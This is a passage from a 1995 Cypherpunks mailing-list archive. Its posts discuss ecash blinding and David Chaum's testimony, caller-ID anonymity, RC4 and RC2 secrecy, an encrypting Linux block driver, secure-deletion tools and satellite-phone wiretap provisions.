27 Jul 95 06:30:03 PDT Subject: Crypto: ride from SF on Saturday Message-ID: <199507271329.IAA10651@icicle> Is anyone driving from the SF area to Crypto (in Santa Barbara) on Saturday? If so, I would like a ride. Bruce ************************************************************************** * Bruce Schneier * Counterpane Systems For a good prime, call 391581 * 2^216193 - 1 * schneier at counterpane.com ************************************************************************** From fc at all.net Thu Jul 27 06:50:36 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Thu, 27 Jul 95 06:50:36 PDT Subject: Full text of David Chaum's Congressional speech In-Reply-To: <199507271307.PAA21979@digicash.com> Message-ID: <9507271344.AA17685@all.net> A few minor comments on David Chaum's testimony before congress: ... > As an American who is regarded as the inventor of electronic cash, > who has worked over the last dozen or so years to make the technology > viable, and who is now CEO of a leading company pioneering in its > commercialization, I am very pleased by the interest being shown > here and to be here today. The inventor of electronic cash is Mr. William S. Powell, who holds the patent on the electronic cashwatch and whose patent has been stomped on by numerous and various others because he doesn't have the money to defend it. David Chaum's published work was more than 7 years later than the issue date of the Powell patent. ... > it will be the responsibility of government to protect against > systemic risk. This is a serious role that cannot be left to the > micro-economic interests of commercial organizations. David's technology notwithstanding, the only way the government can do this is by eliminating the anonymity associated with cash in favor of a fully audited system in which all of the transactions are known to the government. This is fundamentally at odds with the goal of privacy. > In order for those in government to make informed decisions, it will > be necessary for them to understand the basic ways to secure > transactions in different situations. It is unlikely that their decisions will be based on their understanding of technology - it better not be, since they don't understand it. > One basic form is tamper-resistance, exemplified by the chip in a > chip card. It is designed to be hard to modify or to read secrets > from. Such tamper-resistance is needed for "off-line" > payments--those in which the reader device receiving payment from a > card, validates payments by contacting a central system only at the > end of each day. The current technology costs about $500 per chip-card to read and recreate. No current purely electronic technology is capable of being used for a larger value than that under any scheme feasible for electronic money. > (Incidentally, this and the other basic form must rely for security > on cryptography, sometimes refereed to as encryption, which is > fundamental to all information security.) This is not true. The vast majority of effective current technology in information security is not tied to cryptography. ... The testimony goes on and on, but I'll give up here for now. --- -> See: Info-Sec Heaven using our New Super Secure World-Wide-Web Server -> Free: Test your system's security (scans deeper than SATAN or ISS!) ---------------------- both at URL: http://all.net ---------------------- -> Read: "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 ------------------------------------------------------------------------- Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From mark at unicorn.com Thu Jul 27 07:03:23 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Thu, 27 Jul 95 07:03:23 PDT Subject: Full text of David Chaum's Congressional speech Message-ID: On Thu, 27 Jul 1995, Marcel van der Peijl wrote: > Ecash itself is less > prone to abuse than paper bank notes, because privacy is "one-way," > which means that an extortionist, a seller on a black-market, or the > acceptor of a bribe is forever vulnerable to being irrefutably > incriminated by the party that paid them. Now, I'm not sure of this, but as far as I can see, if I was a blackmailer wanting to receive an untraceable payment I could do the following : I create my ecash serial number/hash I blind it with a random number I send it to the payer Payer blinds it again and sends it to the bank Bank signs it and returns it Payer removes their blinding and returns the result to me I remove my blinding and send it to the bank for payment with no chance of being traced. Will this work ? Mark From sunder at escape.com Thu Jul 27 07:17:23 1995 From: sunder at escape.com (Ray Arachelian) Date: Thu, 27 Jul 95 07:17:23 PDT Subject: "Only on the Cypherpunks list..." In-Reply-To: Message-ID: On Tue, 25 Jul 1995, Timothy C. May wrote: > (Smileys for the :=)-impaired...I have nothing against Linux, and even > browsed the new O'Reilly book recently. But I'm _still_ glad I'm "just a > Mac user.") Well you know there is a Mac version of Linux -- not sure if it's available for PPC yet. there also is/was a version of FreeBSD a while back too. (Don't know any details as I haven't done this myself yet.) You could just add another hard drive and run Linux off of it, or install it on a SyQuest cartridge and set the startup disk to point to your SyQuest drive. If you want Linux, start up with the cart. If you don't, startup without it, or with the drive off. Then you can have the best of both. >;-) =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- -/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ From sunder at escape.com Thu Jul 27 07:25:26 1995 From: sunder at escape.com (Ray Arachelian) Date: Thu, 27 Jul 95 07:25:26 PDT Subject: CALLER ID AVOIDANCE (fwd) Message-ID: ---------- Forwarded message ---------- Date: Tue, 25 Jul 1995 23:19:13 -0400 From: Sal Denaro To: sunder at escape.com Newgroups: alt.cypher-punks Subject: Re: CALLER ID AVOIDANCE (fwd) <<<<<< INTERJECTION: I didn't write the message Sal's replying to, Sandy did. Sal's on my 'filtered' cypherpunx list. :-) -- Ray. >>>>>>> In article , Ray Arachelian kept the nurses distracted long enough to write: > SANDY SANDFORT > C'punks, > > While reading the July issue of Soldier of Fortune, I ran across > an ad for yet another telephone anonymity service. It reads: > > CALL 1-900-CUT TRAX > > Secure your most sensitive calls from all forms of > caller I.D. and return-call technologies? > > Now make calls from your own telephone safely and > anonymously. No need to find a public phone to > be discreet. > If they are a Licensed Interchange Carrier they must (by law) provided call records and caller id information on court order. If they fail to answer the court order they could loose the right to operate as a LIC. If they are not a fully licensed carrier, they can have all equipment impounded if they do not honor the court order. Ask anyone who knows telco-law. Let's say you call someone with call-id and do something silly like tell them "I'm going to kill you and your boyfriend, leave my bloody glove at the scene and drive away in my white ford bronco." This scares them. The person calls the cops. The cops call the number on caller id. They track down the service and tell the service- "Give up the call records or get closed down." What do you think the carrier will do? I say this all the time, if you want privacy- Don't use the phone. Here are some things I've heard: (Not responsible for blah blah...) 1) Most caller ID equipment will not display Caller ID from calls made at IDSN phones. 2) Most digital cell-phones have the same quirk. 3) Call-id does not work when calls are made from digital PBXs in Japan. 4) Call-id does not work when calls are made from digital PBXs in most parts of east-block Europe. 5) This happens only in Nynex land and will be fixed by 1997. (yes, 1997) -- Salvatore Denaro sal at panix.com I waited for the joke/It never did arrive. Yes, I use PGP Words I thought I'd choke/I hardly recognize. From joee at li.net Thu Jul 27 07:26:09 1995 From: joee at li.net (j. ercole) Date: Thu, 27 Jul 95 07:26:09 PDT Subject: mac share/freeware app for overwriting unused hd space? Message-ID: Can anyone point me towards a program that's freeware or shareware that will overwrite all the unused i.e., "trashed" space on my hard drive(s)? I sincerely apologise if this is a faq. I know norton's will do it but I don't presently have that installed on my machine. Thanks oodles, joe j. ercole ny, usa vox: 516.681.3548 e-mail: joee at li.net finger for pgp public key From frissell at panix.com Thu Jul 27 07:44:23 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 27 Jul 95 07:44:23 PDT Subject: Banks and Crypto Message-ID: <199507271401.KAA10983@panix.com> At 11:29 PM 7/26/95 -0400, Robert A. Rosenberg wrote: >Is there ANY reason why you did not just paste the text of this file into >your message? Also, if you are going to attach files in lieu of writing >messages, it might be useful to mention what word processor was used to >create the file so it can be read. In this case, what format is your file >in? My copy of that inferior word processor Word for Windows 6.0 tells me it is Wordperfect for DOS 5.1. DCF "The Market is X the Unknown, The Blob, and Blue Goo." From perry at imsi.com Thu Jul 27 07:48:03 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 27 Jul 95 07:48:03 PDT Subject: "Only on the Cypherpunks list..." In-Reply-To: Message-ID: <9507271447.AA12988@snark.imsi.com> Ray Arachelian writes: > Well you know there is a Mac version of Linux -- not sure if it's > available for PPC yet. there also is/was a version of FreeBSD a while > back too. (Don't know any details as I haven't done this myself yet.) NetBSD, not FreeBSD. There is also MachTen. .pm From sunder at escape.com Thu Jul 27 07:56:13 1995 From: sunder at escape.com (Ray Arachelian) Date: Thu, 27 Jul 95 07:56:13 PDT Subject: "Only on the Cypherpunks list..." In-Reply-To: <9507271447.AA12988@snark.imsi.com> Message-ID: On Thu, 27 Jul 1995, Perry E. Metzger wrote: > Ray Arachelian writes: > > Well you know there is a Mac version of Linux -- not sure if it's > > available for PPC yet. there also is/was a version of FreeBSD a while > > back too. (Don't know any details as I haven't done this myself yet.) > > NetBSD, not FreeBSD. There is also MachTen. Thanks. :-) MachTen though isn't freeware as Linux is. :-) The problem I have with it is that it's a hosted OS and as such is limited to the Mac's problems. i.e. - lack of true preemptive multi-tasking and protected memory. Though the M680x0 series and all Mac motherboards can support both preemption and protected memory, Apple in its grand wisdom (or lack thereof?) is only now writing it into the next version of it's OS. Other than that I love the Mac. :-) =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- -/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ From Michael at umlaw.demon.co.uk Thu Jul 27 08:09:57 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Thu, 27 Jul 95 08:09:57 PDT Subject: International raids on internet "porn ring" Message-ID: <2816@umlaw.demon.co.uk> Today's Guardian (uk) reports at page 4, column 2: [I've edited this down] "Police move on Internet porn" By Owen Bowcott Vice squad officers from eight police forces yesterday took part in an internationally-co-ordinated operation aimed at suspected paedophiles who are alleged to have been exchanging child pornography on the Internet. Nine people were arrested in early morning raids in the United Kingdom and a further 31 were detained elsewhere in her, America, the far east and South Africa. Codenamed Operation Starburst, the investigation follows growing concerns [about internet porn] ... In the United Kingdom, 13 search warrants were executed ... Computer equipment was seized. Those arrested were questioned but later released on bail. [later the article reports 9 arrests and 17 computers seized] The inquiry was prompted by officers in the West Midlands police commercial vice unit who had identified several Britons they believed were distributing child pornography on the Internet. The Paedophile Unit and the National Criminal Intelligence Service made contact with overseas police forces to trace people suspected of trading obscene pictures. [Detectives then quoted describing how "appalling" and "hard core" the pictures were, and saying that the "perverts were not making profits from the pictures" just trading them.] -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html From jcorgan at aeinet.com Thu Jul 27 09:06:49 1995 From: jcorgan at aeinet.com (Johnathan Corgan) Date: Thu, 27 Jul 95 09:06:49 PDT Subject: Encrypting block driver for Linux...need some advice In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 27 Jul 1995, Andy Brown wrote: > Your scheme should be OK. If you'd chosen the same IV for each sector > then identical sectors would encrypt the same. If I remember rightly > then having a known IV only affects the security of the first block, > after that the ciphertext chaining comes into effect. I suspected as much. I don't see how a known IV affects the security of the first block even (and perhaps I'm exposing some real crypto-ignorance here :). Someone pointed out in private mail that the SFS docs have a good section on IV selection techniques...I'll go off and read those. == Johnathan Corgan "For the first time in history, it is possible to jcorgan at aeinet.com have absolute privacy over arbitrary distances." PGP Key Fingerprint: 4F 28 69 B8 76 2E 42 3E 8B 4C 12 BB 3A 43 D4 07 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEUAwUBMBfGZelPfVlQ1n99AQFcswf470WxqWkne0OPdCeKcc8Gaei7AIeKUg// CzrgD6ATPLrpMZcmNCMtv0cY4jo3tUnbJI50plyuda8v8Hlyc5l1ejSO0YoOBZrs ICFhQfXp6bpPxV8ZFKozKo1N3RlcpgtArMZqoKZ4jfg3kMCTtBU2bc7Kh793sk3d EXS2GcPpXYUiTMJ53IJyBXcl2KX1MnCUkWVeal8D9kGY4/8pfJFLWuqBpsUDCQsW yamvhcDiltCD6ukRwQ7Vpu3dWCn0ZxjWg0emg/toqNNdKB950Bh+dlgd5z/LabTn 4eSPdqeWQW/W96cShm1y73AbGM8hJWWAuMKrFuaoyR1ilIis03eT =sheZ -----END PGP SIGNATURE----- From jcorgan at aeinet.com Thu Jul 27 09:20:10 1995 From: jcorgan at aeinet.com (Johnathan Corgan) Date: Thu, 27 Jul 95 09:20:10 PDT Subject: Encrypting block driver for Linux...need some advice In-Reply-To: <199507261756.UAA13722@shadows.cs.hut.fi> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 26 Jul 1995, Tatu Ylonen wrote: > How about using the md5 hash of the block number combined with some > secret data; e.g, the md5 hash of the passphrase reversed (I would not > want to use the password directly, as that might help in breaking the > key; on the other hand, md5 of block number alone is not good because > there is a very limited number of blocks (and the attacker knows which > block is being attacked)). I guess my question is how does knowing the IV affect the security of CBC? I assumed that it only needed to be different for each block so that identical plaintext encrypts to different ciphertext for different blocks. > You might also want to support other algorithms, particularly IDEA > (but beware, IDEA is patented and causes problems for commercial use - > non-commercial use should be free). Another algorithm to support > might be Blowfish. Yes, I plan on it. Originally, I just grabbed RSAREF for a quick and dirty drop in. > Could you describe the implementation a little? Does it use the nfs > interface, or is it somewhere in the kernel file system code? Or > kernel block device code? (User-level NFS servers may involve > difficult security issues) The software is a block device driver. To use it, a user will run an executable that will pass a filespec and key to the driver. The driver then translates calls to its block interface into calls to lseek/read/write on the underlying inode. Data is d(e)ncrypted on the fly during this process. The user can then do anything you would normally do with a block device--make a file system on it, tar files to it, use it for swap. If the provided filespec is actually located remotely, and is accessed via NFS, SMB, or some other network protocol, then the benefit is that only ciphertext is passed on the wire. I'm stuck on figuring the the proper permissions for the device special file, the attachment executable, and how to deal with one user attaching the filespec to the driver, but allowing some predefined user list have access. All potential users of the driver need to have rw permission to it, but in practice, the kernel module should only honor block read/write calls make by authorized user processes. I guess I need to step back and look a what types of threat models I should address, and go from there. That, and get a good book on Unix security :) == Johnathan Corgan "For the first time in history, it is possible to jcorgan at aeinet.com have absolute privacy over arbitrary distances." PGP Key Fingerprint: 4F 28 69 B8 76 2E 42 3E 8B 4C 12 BB 3A 43 D4 07 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMBfKaelPfVlQ1n99AQF7+gf+I+BV1EVPQhrT7FEygT7f8PC29kZuSseU /qDlVbBrwHfzXOMgEBEkG214p9Xv1cPFQ+IlGglo321/92pxZdModA45oM3cG1ic hv8oZ+KWIL6twhKX7M3aw5tYOBTTGcdyNqEosnntE1/eAnSEPaQgt8VLyoNBjSFN 64FZvTtR7G8O2HL26SYS1PzhEl3aPRdKv3Qw+kgu1xW+VLC5DcJs34/f1Nta6xBu gFH9mfZZg4Y4VAMMyvQN+JAm7EmmIiCWAypqnwUt0SCgnpYub2EOfoKQOJ7e5hl5 9qcaLzeJsHpLGybcfT6cSEKjJ+b9MdTXrHQRPPdr2ZehcmyVSSLA7A== =G47N -----END PGP SIGNATURE----- From hfinney at shell.portal.com Thu Jul 27 09:38:18 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 27 Jul 95 09:38:18 PDT Subject: Full text of David Chaum's Congressional speech Message-ID: <199507271636.JAA26799@jobe.shell.portal.com> From: "Rev. Mark Grant" > Now, I'm not sure of this, but as far as I can see, if I was a > blackmailer wanting to receive an untraceable payment I could do the > following : > > I create my ecash serial number/hash > I blind it with a random number > I send it to the payer > > Payer blinds it again and sends it to the bank > > Bank signs it and returns it > > Payer removes their blinding and returns the result to me > > I remove my blinding and send it to the bank for payment with > no chance of being traced. > > Will this work ? I believe this will work, in most blinded-ecash systems. Another way to express it is you force the user to withdraw cash such that it comes into your wallet. There are some technical counter-measures though. One is to have some secure tamper-proof hardware which enforces certain kinds of ecash transfers. The above transfer would not be a legal one. Only transfers which would allow various forms of traceability would be allowed. Another approach was described by Chaum in one of his papers. I can't remember the details, but basically the user had to go through a preliminary transaction with the bank when he opened his account, to get a whole lot of tokens which would later be turned into ecash. He has to get a lot of them because these will be for all the ecash he will use for a whole decade (or whatever). Then the withdrawal protocol is one which turns a token into an ecash value. The result of this approach is that the blinding is in effect fixed in advance and there is no way to force different blinding under duress. I posted more detail on this to the list sometime last year but I don't remember when unfortunately. Note of course that this whole traceability business only works if you have to identify yourself to the bank whenever you deposit the money. If someone allows anonymous banknote exchange then the whole "advantage" goes out the window. IMO payee anonymity will be a desired feature of ecash systems and I think Chaum is making a mistake claiming that it will not or should not exist. Another quibble is that blackmail is not a good example. The payor doesn't want to blow the whistle on his blackmailer; the blackmailer is doing the payor a favor by giving him the option of paying money rather than having the damaging information revealed. Often the payor will know who the blackmailer is. Hal From mark at unicorn.com Thu Jul 27 09:47:11 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Thu, 27 Jul 95 09:47:11 PDT Subject: Full text of David Chaum's Congressional speech In-Reply-To: <199507271636.JAA26799@jobe.shell.portal.com> Message-ID: On Thu, 27 Jul 1995, Hal wrote: > There are some technical counter-measures though. One is to have some > secure tamper-proof hardware which enforces certain kinds of ecash > transfers. Yes, that's what I was thinking too... you'd have to hack the software to do it with the current Ecash implementation, but it ought to be possible if you had to. > IMO payee anonymity will be a desired feature of > ecash systems and I think Chaum is making a mistake claiming that it will > not or should not exist. Yep, I agree... > Another quibble is that blackmail is not a good example. Ooops... brainfade.. yes you're right 8-).. Mark From stopak at orionsci.com Thu Jul 27 10:33:19 1995 From: stopak at orionsci.com (Noam Stopak) Date: Thu, 27 Jul 95 10:33:19 PDT Subject: patented vs secret (was Re: RC4) In-Reply-To: Message-ID: <9507271733.AA05542@orionsci.com> > > By the way, since RSA is such a vocal opponent of the Clipper chip on the > grounds of its secret Skipjack algorithm, why does it market secret > algorithms like RC4 and RC2? Does this seen like a double face to anyone > else? > > ----------------------------------------------------------- > Russell Ross email: rross at sci.dixie.edu > 1260 N 1280 W voice: (801)628-8146 > St. George, UT 84770-4953 Patented does not equal secret. The argument against Clipper (at least one of them ;-), is that it has not been subjected to review outside of the NSA. I believe the code for RC4 and RC2 is accessible and has been subjected to review by many in the crypto field - you just can't use it legally without a license. Noam From rross at sci.dixie.edu Thu Jul 27 10:40:39 1995 From: rross at sci.dixie.edu (Russell Ross) Date: Thu, 27 Jul 95 10:40:39 PDT Subject: patented vs secret (was Re: RC4) Message-ID: >> >> By the way, since RSA is such a vocal opponent of the Clipper chip on the >> grounds of its secret Skipjack algorithm, why does it market secret >> algorithms like RC4 and RC2? Does this seen like a double face to anyone >> else? >> >> ----------------------------------------------------------- >> Russell Ross email: rross at sci.dixie.edu >> 1260 N 1280 W voice: (801)628-8146 >> St. George, UT 84770-4953 > >Patented does not equal secret. The argument against Clipper (at least one >of them ;-), is that it has not been subjected to review outside of the NSA. > >I believe the code for RC4 and RC2 is accessible and has been subjected to >review by many in the crypto field - you just can't use it legally without >a license. > >Noam Source code for them is available for $25,000, but only binaries are available otherwise. The source code for RC4 was leaked or reverse-engineered, so it is widely known now, but RSA has never released the algorithm officially. I have found no documentation on the algorithm behind RC2. They are in fact secret, proprietary algorithms, with the exception of the unofficial RC4 code. ----------------------------------------------------------- Russell Ross email: rross at sci.dixie.edu 1260 N 1280 W voice: (801)628-8146 St. George, UT 84770-4953 From gnu at toad.com Thu Jul 27 11:05:16 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 27 Jul 95 11:05:16 PDT Subject: Allan Schiffman on SHTTP removing PGP support Message-ID: <9507271805.AA27155@toad.com> I asked Allan, who spoke on S-HTTP at a recent BayFF meeting, about this. Date: Tue, 25 Jul 95 20:02:12 PDT From: ams at eit.COM (Allan M Schiffman) Its true, the most recent draft of the S-HTTP spec depreciated (that is, dropped) support for PGP encapsulation. Eric and I did this because we: 1) Hadn't implemented PGP support ourselves. 2) Knew of no other S-HTTP implementation which did (we know of three other S-HTTP implementations). 3) Were unsatisfied with the formalization of PGP encapsulation format (as opposed to the behavior of a particular program). 4) Realized that our spec didn't permit implementation given our lack of support for PGP name forms and keying materials. An alternative to dropping PGP would have been to fix this, but we didn't have the time (or the motivation, given 1-3 above). That doesn't mean "X.509 all the way" for S-HTTP, by a long shot. We have publically committed (at the IETF WTS WG last week) to support MOSS, with all its name forms and keying materials. The next draft of the spec will detail how to do this, probably emphasizing the use of new key management mechanisms made possible by Secure DNS. For what its worth, I'm no fan of X.509, although I'm on record as a believer in "multiply-rooted qualified hierarchical trust" (which presumably classifies me as an "anal hierachy fan"). -Allan From halvork at hiof.no Thu Jul 27 11:10:50 1995 From: halvork at hiof.no (Halvor Kise jr.) Date: Thu, 27 Jul 95 11:10:50 PDT Subject: mac share/freeware app for overwriting unused hd space? In-Reply-To: Message-ID: On Thu, 27 Jul 1995, j. ercole wrote: > Can anyone point me towards a program that's freeware or shareware that > will overwrite all the unused i.e., "trashed" space on my hard drive(s)? I > sincerely apologise if this is a faq. I know norton's will do it but I > don't presently have that installed on my machine. Thanks oodles, > joe I once had a program called Burn, which is another trachcan, but overwrites the data X-times. (You choose yourself how many!) You can get it at: ftp://ftp.usa.net/users/mdw/mac/burn/ Hope this helps, - Halvor. -- *** MEMENTO MORI *** PGP-key by fingering halvork at frodo.hiof.no http://www.hiof.no/~halvork/ * Support The Phil Zimmermann legal defense fund * http://www.netresponse.com/zldf From adam at bwh.harvard.edu Thu Jul 27 11:31:48 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 27 Jul 95 11:31:48 PDT Subject: patented vs secret (was Re: RC4) In-Reply-To: <9507271733.AA05542@orionsci.com> Message-ID: <199507271830.OAA22564@bwh.harvard.edu> | I believe the code for RC4 and RC2 is accessible and has been subjected to | review by many in the crypto field - you just can't use it legally without | a license. This is not correct. RC2 is not public; something that interoperates with RC4 was posted to cypherpunks & sci.crypt last year. Neither have undergone any peer review that has been published (AFAIK). A paper on RC5 is listed in the Crypto 95 schedule, but nothing on RC4. Also, the usability of RC4 is very open to question. Since it was a trade secret, it was not patented. Several smart people have said that once a trade secret becomes well known, its out protections. But few people want to get a nasty letter ffrom RSA's lawyers, so no one in the US has released anything with RC4 in it without the RSA licenses. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From Ted_Anderson at transarc.com Thu Jul 27 13:25:55 1995 From: Ted_Anderson at transarc.com (Ted_Anderson at transarc.com) Date: Thu, 27 Jul 95 13:25:55 PDT Subject: Sat phone permit "wire"taps Message-ID: I found these paragraphs in a recent Space News interesting. They were at the end of an article titled "Military Officials Open To Using Civilian Links" in the July 3rd issue. "Officials said government police authorities have expressed concern that satellite telephone systems may enable people to conduct conversations that are out of the earshot of government investigators. This would be particularly true in an area where, for example, there were no gateway through which government investigators could tap into calls. "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include features to permit authorized eavesdropping, officials said. "``Iridium will include a leased land line to areas where there are now local gateways to permit monitoring,'' Johnson said. ``We are willing to put the technical capability to do this in the hands of the governments. They then will have to pay to have all those people listen to all those telephone calls.''" Ted Anderson From lwp at mail.msen.com Thu Jul 27 13:59:31 1995 From: lwp at mail.msen.com (Lou Poppler) Date: Thu, 27 Jul 95 13:59:31 PDT Subject: Chiding: (was Re: Banks and Crypto) In-Reply-To: Message-ID: Just a friendly toasting, not a flame: You are totally correct in beseeching this person to use a little sense with unnecessary abuse of attachments. This has rapidly grown to be one of my own pet peeves, as mail agents automaticly abuse MIME without their users probably even knowing what's happening. BUT: (as I hope you already realize) It is not necessary to send your lecture to the whole list! This failure to edit down the recipient list is another variant of the same transgression you are complaining of. (At the very least, you could change the subject line, like I am now going to force myself to do in this message). On Wed, 26 Jul 1995 23:29:55 -0400, "Robert A. Rosenberg" wrote: } At 13:25 7/26/95, KDAGUIO at aba.com wrote: } >See attached file: F:\OFFILES\KODMAIL.MSG } > } > } > } >Attachment converted: Macintosh HD:KODMAIL.MSG (????/----) (0002C85B) } } } Is there ANY reason why you did not just paste the text of this file into } your message? Also, if you are going to attach files in lieu of writing } messages, it might be useful to mention what Wordprocessor was used to } create the file so it can be read. In this case, what format is your file } in? } } Thank you. } } } :::::::::::::::::::::::::::::::::::::: Thank you VERY much! You'll be :: Lou Poppler :: getting a Handsome Simulfax Copy :: http://www.msen.com/~lwp/ :: of your OWN words in the mail :::::::::::::::::::::::::::::::::::::: soon (and My Reply). From nsb at nsb.fv.com Thu Jul 27 14:11:27 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 27 Jul 95 14:11:27 PDT Subject: You have cashed my check.... In-Reply-To: Message-ID: <8k601XmMc50e1Dw2ZC@nsb.fv.com> First of all, let me publicly apologize for any role we may have played in your problem. I don't yet know if there's a bug in our system or EDS' system that caused this to happen, but if so I assure you it will be found and fixed. We are investigating. I am responding now -- in advance of any real facts to offer you -- primarily because you sent a CC of your mail to so many public lists. The "humanhelp" address on your mail will feed into a complex customer support department, from which you should already have received an automatic acknowledgement and a "tracking code". You should receive a response from one of our human operators within 48 hours. However, the way that the humanhelp software works, those answers will NOT automatically be CC'ed to cypherpunks and all the other places you CC'ed your question. Therefore I am answering you now in order to assure everyone who saw your message (via those widespread CC's) that it is indeed being handled through the normal channels, but that FV's responses will not be widely cc'ed. It will come to you alone, as private mail. In general, it isn't necessary to CC the world on your first interaction with a customer service department; perhaps if you had sent us several messages and we hadn't answered you, this would have been an appropriate response. As it is, the situation is almost certainly either a human error in the data entry for your bank account or a hitherto-undiscovered software bug. But we have many happy sellers who can attest to the fact that we do regularly deposit money in their bank accounts. It's not a scam. Please don't assume the worst until you give us a chance to diagnose and fix the problem. (In fact, if it were a scam, why would we send you an alarming-looking letter telling you that your bank account information appears to be invalid? It seems to me that it would be much smarter for us to just quietly eat your money, if that's what we wanted to do!) I assume that you did not, in fact, close or otherwise change your bank account -- if you did, that would certainly explain the whole episode, and our system would be functioning completely as intended. We will proceed in our investigation under the assumption that this is not the case, and will let you know (via private email) what we find out. At some point, someone may need to contact you via telephone to verify your account information. Stay tuned. -- Nathaniel -------- Nathaniel S. Borenstein | When privacy is outlawed, Chief Scientist, First Virtual Holdings | only outlaws will have privacy! FAQ & PGP key: nsb+faq at nsb.fv.com | SUPPORT THE ZIMMERMAN DEFENSE FUND! ---VIRTUAL YELLOW RIBBON-->> zldf at clark.net From sdw at lig.net Thu Jul 27 14:31:07 1995 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 27 Jul 95 14:31:07 PDT Subject: Zyxel 28.8K/ISDN modem support of DES Message-ID: The data sheets for the new Zyxel modems (Elite 2864/2864I) mentions that they include DES capability. The fully ISDN 2864I without/with NT-1 retails for $699/$749. Only the I model (with built-in complete ISDN) supports DES according to the data sheet. 2864 retails for $549 and they have a non-ISDN modem even cheaper. They support almost every conceivable feature, including ISDN on both B channels, ISDN on one with analog conversion on the other, and built-in microphone and speaker jacks to better support voice capability. (The 1496E's could be used as voice mail systems, etc.) Firmware in flash EPROMS (8MBit) and supports 8MByte DRAM sockets for addon memory (used to support buffering for it's plain paper fax conversion to the built-in parallel port (without computer help)). Of course, hard to tell if there's any way to control audio recording/playing while having an active data connection with the standard eprom. IF you could find out how to control it OR if there is a way to communicate in a multichannel way to the various 'peripherals', then you could produce a pretty nifty PGP-Voice system. I didn't mention lots of other features (most inherited from the 1496's): Caller-ID, distinctive ring, touch tone recognition, V.42bis over ISDN, 460.8KBPS/serial. sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From koontz at MasPar.COM Thu Jul 27 14:46:14 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Thu, 27 Jul 95 14:46:14 PDT Subject: Sat phone permit "wire"taps Message-ID: <9507272149.AA07902@argosy.MasPar.COM> > "Officials said government police authorities have expressed concern >that satellite telephone systems may enable people to conduct >conversations that are out of the earshot of government investigators. Perish the thought that We the People might be sovereign. From don at cs.byu.edu Thu Jul 27 14:49:03 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Thu, 27 Jul 95 14:49:03 PDT Subject: Attachments, crypto, et al Message-ID: <199507272147.PAA25723@bert.cs.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- My rule is no binaries, none of the time. Grepping for whitwater and foster and routing it to /dev/null seems like a good idea too.. And a great big *plonk* to our alt.conspiracy friends... Need to learn what a pointer is... Anyway, my tri-county crime spree for the next weeks will put me in San Francisco, Alameda, and Orange counties. If anyone wants to mutually sign keys, email me and I'll try to arrange something. Unfortunately my cryptoshirt won't arrive in time. I'd be able to wear it in front of LOTS of illegal aliens. So, to make up for it, I'm going to export part of the cryptosig: # Have a nice day. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMBgIxcLa+QKZS485AQFmVAMA0AijobnuJaumiM3LKfwdUK/ENRlbadJ2 DmElG3VDRaYtx4PNPXtjVXkV3CMt2CHEEvs4nmIlieZgOn/UkK0yWDbz95+qhul/ SCwOZ7jWHrika/pJKy2UX4HaEyjHtyvq =GXbe -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From pgf at tyrell.net Thu Jul 27 15:47:29 1995 From: pgf at tyrell.net (Phil Fraering) Date: Thu, 27 Jul 95 15:47:29 PDT Subject: Full text of David Chaum's Congressional speech In-Reply-To: <9507271344.AA17685@all.net> Message-ID: 